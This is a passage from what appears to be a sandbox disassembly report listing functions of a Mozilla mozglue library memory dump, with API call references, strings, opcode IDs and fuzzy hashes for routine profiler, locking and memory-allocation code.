MOZ_PROFILER_STARTUP, xrefs: 6C69E5A1, 6C69E5CC, 6C69E5FF, 6C69E62A
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C69E722, 6C69E750, 6C69E7A2
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C69E777
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C69E826, 6C69E850
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C69E655

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 1eca9647559c815ef8c16a1fd9d354fdd95aa9a5c77d5d2c3967643dee620f54
Instruction ID: 8c3d27a3f7cef48c4ed5c2157a3c3fed9863bba23175123dc71420e2c82529b7
Opcode Fuzzy Hash: 1eca9647559c815ef8c16a1fd9d354fdd95aa9a5c77d5d2c3967643dee620f54
Instruction Fuzzy Hash: 4111AD31A04258DFCB009F16C888B6ABBB4FFC9329F050A19E84587651D774B805CFDE

Function 6C6A0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A0CD5

Part of subcall function 6C68F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C68F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A0D40
free.MOZGLUE ref: 6C6A0DCB

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

free.MOZGLUE ref: 6C6A0DDD
free.MOZGLUE ref: 6C6A0DF2

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: fce425f7b408e5fb4db8014b62f0115985f6ab6ab260e4d0d9e1334d07c0fba8
Instruction ID: 0744bd5b5f7c2c126cec454ca987b28fa44c9ec751ffde8c5b25c6819782081d
Opcode Fuzzy Hash: fce425f7b408e5fb4db8014b62f0115985f6ab6ab260e4d0d9e1334d07c0fba8
Instruction Fuzzy Hash: 154139719087809BD320DF29C08079AFBE5BFC9714F118A2EE9D987750D770A846CB9B

Function 6C6ACCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACDA4

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

Part of subcall function 6C6AD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C6ACDBA,00100000,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD158
Part of subcall function 6C6AD130: InitializeConditionVariable.KERNEL32(00000098,?,6C6ACDBA,00100000,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACDC4

Part of subcall function 6C6A7480: ReleaseSRWLockExclusive.KERNEL32(?,6C6B15FC,?,?,?,?,6C6B15FC,?), ref: 6C6A74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6ACECC

Part of subcall function 6C66CA10: mozalloc_abort.MOZGLUE(?), ref: 6C66CAA2

Part of subcall function 6C69CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C6ACEEA,?,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000), ref: 6C69CB57
Part of subcall function 6C69CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C69CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C6ACEEA,?,?), ref: 6C69CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C69DA31,00100000,?,?,00000000,?), ref: 6C6AD058

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 17b39ecca14ffcae6143c17bfe05fa816367e042abf1e00a0f871d2f8f566c65
Instruction ID: 7f1d13926e85e4132c53c4f335a1232c33e1e35778ffcb01c90bc5c865becd05
Opcode Fuzzy Hash: 17b39ecca14ffcae6143c17bfe05fa816367e042abf1e00a0f871d2f8f566c65
Instruction Fuzzy Hash: 2FD16F71A04B469FD708CF28C480B99F7E1BF89308F01866DD95987712EB31B9A6CBC5

Function 6C675C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C675D40
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C675D67
__aulldiv.LIBCMT ref: 6C675DB4
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C675DED

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: fccf99705cd4046480c0da99a08bcdfb038165868c156f85a6ca97cbfd90524e
Instruction ID: d33b4dba655bb99291579b5ea7e7ad6204471695016f9aad492d62ec9b1b7e3c
Opcode Fuzzy Hash: fccf99705cd4046480c0da99a08bcdfb038165868c156f85a6ca97cbfd90524e
Instruction Fuzzy Hash: 89518F71E001698FCF08CF69C994AAEBBF1FB85304F198A5DD811A7B50C7307945CB99

Function 6C65CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C65CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C65CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C65CF4E

Strings

0, xrefs: 6C65CF30

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 196597a6bdbc8dad2df6b501d6b72384db2d0378a8bf5e5c92be4be767be814e
Instruction ID: e54310c26906e80553e8d3bb2d46e827d1f78c5d19c18f1187dfef5d907545ba
Opcode Fuzzy Hash: 196597a6bdbc8dad2df6b501d6b72384db2d0378a8bf5e5c92be4be767be814e
Instruction Fuzzy Hash: 9D511475A002568FCB00CF18C890A9AFBB5EF99300F29859DD95A5F351D731ED16CBE0

Function 6C696470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C6982BC,?,?), ref: 6C69649B

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6964A9

Part of subcall function 6C68FA80: GetCurrentThreadId.KERNEL32 ref: 6C68FA8D
Part of subcall function 6C68FA80: AcquireSRWLockExclusive.KERNEL32(6C6DF448), ref: 6C68FA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C69653F
free.MOZGLUE(?), ref: 6C69655A

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 84f714f4f15ae930f76b2db4f443e3ba3e75a5f9a40559ef3b81db765fb5b1f9
Instruction ID: 98cb846002616a141ddfcc5cd91472c026677bdcc18c31a34d08c92d525b97ac
Opcode Fuzzy Hash: 84f714f4f15ae930f76b2db4f443e3ba3e75a5f9a40559ef3b81db765fb5b1f9
Instruction Fuzzy Hash: 223161B5A04305AFD740CF15D88469AB7E4FF89314F00482EE85A97751DB34E919CBDA

Function 6C66B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C66B4F5
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C66B502
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C66B542
free.MOZGLUE(?), ref: 6C66B578

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: d6fce4e0f5ce2d2612f5934e6f077c7e1e761546c7ba7781ddcddf79526bcbfe
Instruction ID: f8c6926e3cb4d4af112b9870dfa7403b397d49b61d05b120268176a51f4f12c6
Opcode Fuzzy Hash: d6fce4e0f5ce2d2612f5934e6f077c7e1e761546c7ba7781ddcddf79526bcbfe
Instruction Fuzzy Hash: 85110330A04B41C7D321CF2AC8407A5B3B0FFDA319F14970AE84953E02EBB0B5C5879A

Function 6C693DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C65F20E,?), ref: 6C693DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C65F20E,00000000,?), ref: 6C693DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C693E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C693E0E

Part of subcall function 6C68CC00: GetCurrentProcess.KERNEL32(?,?,6C6531A7), ref: 6C68CC0D
Part of subcall function 6C68CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C6531A7), ref: 6C68CC16

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 82a6360a373ecd281ae6919c82bcd1b75556bec14f788fb4d8f0f9eba5c47a7f
Instruction ID: 1eb75ff979cc5475eae7f49dcf4a0ee0aad8e9e8d9996727dab3d755bc266919
Opcode Fuzzy Hash: 82a6360a373ecd281ae6919c82bcd1b75556bec14f788fb4d8f0f9eba5c47a7f
Instruction Fuzzy Hash: 9BF0F8B1A002087BDB00AB55EC81DAB376DEB87628F040021FE0957741D636BE6996FF

Function 6C6A85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C6A85D3

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C6A8725

Strings

map/set<T> too long, xrefs: 6C6A8720

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: a2a27303650dbd5e9a7fe60878a720a47f4d3f5136fab0440a28ca324daa6040
Instruction ID: 70b27cce337b19c255c6b91cde610e625e735871812691eeb71a8baf6980d39e
Opcode Fuzzy Hash: a2a27303650dbd5e9a7fe60878a720a47f4d3f5136fab0440a28ca324daa6040
Instruction Fuzzy Hash: FA515674A006818FE701CF58C184A59FBF1BF4A318F19C19AD8595BB62C375EC46CF96

Function 6C65BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C65BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C65BE8F

Strings

0, xrefs: 6C65BE5B

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 649d6500970ca855c2c481ee1f24676c81dfb6642f3f8c832d97c200676fd99e
Instruction ID: 5aff77c52a83a249f610f6a40117f5f17253505299baa17352f2cf3b02d9aadf
Opcode Fuzzy Hash: 649d6500970ca855c2c481ee1f24676c81dfb6642f3f8c832d97c200676fd99e
Instruction Fuzzy Hash: 6F41B171A09745CFC301CF28C481A9BB7F4AFCA388F544B1DF985A7611D730E9698B8A

Function 6C693CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C693D19
mozalloc_abort.MOZGLUE(?), ref: 6C693D6C

Strings

d, xrefs: 6C693D58

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 79547db147bd6d31f76d90bae60149de37a63823fd5d36e282509eb561b16e80
Instruction ID: ae81405fb39a1e9092750637fc88ed10a7b0fe2e72f912b9bd23e2162f856e3d
Opcode Fuzzy Hash: 79547db147bd6d31f76d90bae60149de37a63823fd5d36e282509eb561b16e80
Instruction Fuzzy Hash: 8111C435E0468997DB008F6ACC644EDB7B5EF86318F458229DD4997622EB30A688C398

Function 6C6B6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C6B6E22
__Init_thread_footer.LIBCMT ref: 6C6B6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C6B6E1D

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 39a29bee2b8b57065e6a5f8ed2424b066c1647657c83e079799a23cb29785f06
Instruction ID: bcd68a56edc4a956bdd073aa2d8006e056c651a881adc380280f84d7f154e701
Opcode Fuzzy Hash: 39a29bee2b8b57065e6a5f8ed2424b066c1647657c83e079799a23cb29785f06
Instruction Fuzzy Hash: 2DF02E302492C08BDB008B69C8A1A9173B29303318F080165F80196FA2CB31F627CFAF

Function 6C669E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C669EEF

Strings

Infinity, xrefs: 6C669EB7
NaN, xrefs: 6C669EC1

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: 69064ab08258a321f268fc936855b8ae153423eff6b17a422022ef0b64cf6071
Instruction ID: c4194f2a258d45e7e49048328d94766e7d17b0c02063ac6c994417b112666e3a
Opcode Fuzzy Hash: 69064ab08258a321f268fc936855b8ae153423eff6b17a422022ef0b64cf6071
Instruction Fuzzy Hash: E1F06D71601641CBDB00CF5AD8C5B9033F1B74771DF250A19C9440AF81D7767646CA9F

Function 6C666C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0Kil,?,6C694B30,80000000,?,6C694AB7,?,6C6543CF,?,6C6542D2), ref: 6C666C42

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

moz_xmalloc.MOZGLUE(0Kil,?,6C694B30,80000000,?,6C694AB7,?,6C6543CF,?,6C6542D2), ref: 6C666C58

Strings

0Kil, xrefs: 6C666C33, 6C666C41, 6C666C57

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0Kil
API String ID: 1967447596-1570486273
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: 47a2848e409718a8f1d8a2683fe2594ab049f9b896a105d641ef50186a662689
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: F4E086F1A10D455B9F08D97FAC0956A71C88B553AC7044A35E823C6FC8FAB4E550815F

Function 6C66BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C66BEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C66BEF5

Strings

cryptbase.dll, xrefs: 6C66BEF0

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: 4870778a0ef8a45ee3d799cae793fcd5ec17f4a2edcaed08401fe318736b03b0
Instruction ID: 44563a522ee1324380eaf9a3347d73bdea828b5c897ecfb4e6088c6321dae0f1
Opcode Fuzzy Hash: 4870778a0ef8a45ee3d799cae793fcd5ec17f4a2edcaed08401fe318736b03b0
Instruction Fuzzy Hash: F7D0A731184209E6C7006B528C05B2937749782795F10C020F30544C52C7B0B413DF4D

Function 6C6AB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C6AB2C9,?,?,?,6C6AB127,?,?,?,?,?,?,?,?,?,6C6AAE52), ref: 6C6AB628

Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A90FF
Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6AB2C9,?,?,?,6C6AB127,?,?,?,?,?,?,?,?,?,6C6AAE52), ref: 6C6AB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6AB2C9,?,?,?,6C6AB127,?,?,?,?,?,?,?,?,?,6C6AAE52), ref: 6C6AB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C6AB127,?,?,?,?,?,?,?,?), ref: 6C6AB74D

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 40779d404a368615f40afe1c83035d14527e88d70c3251f7b9a6a7ada22aca6f
Instruction ID: 085effcad87eddf0045659a872f45dad84b52f8dd6c581acd935d8d6010fba1a
Opcode Fuzzy Hash: 40779d404a368615f40afe1c83035d14527e88d70c3251f7b9a6a7ada22aca6f
Instruction Fuzzy Hash: 2251D071A0121A8FDB14CF98C98076EB7B1FF85308F55852DC85AAB710D771EC06CBA9

Function 6C6A6E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C6A6EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C6A6EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C6A6F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6A6F5C

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
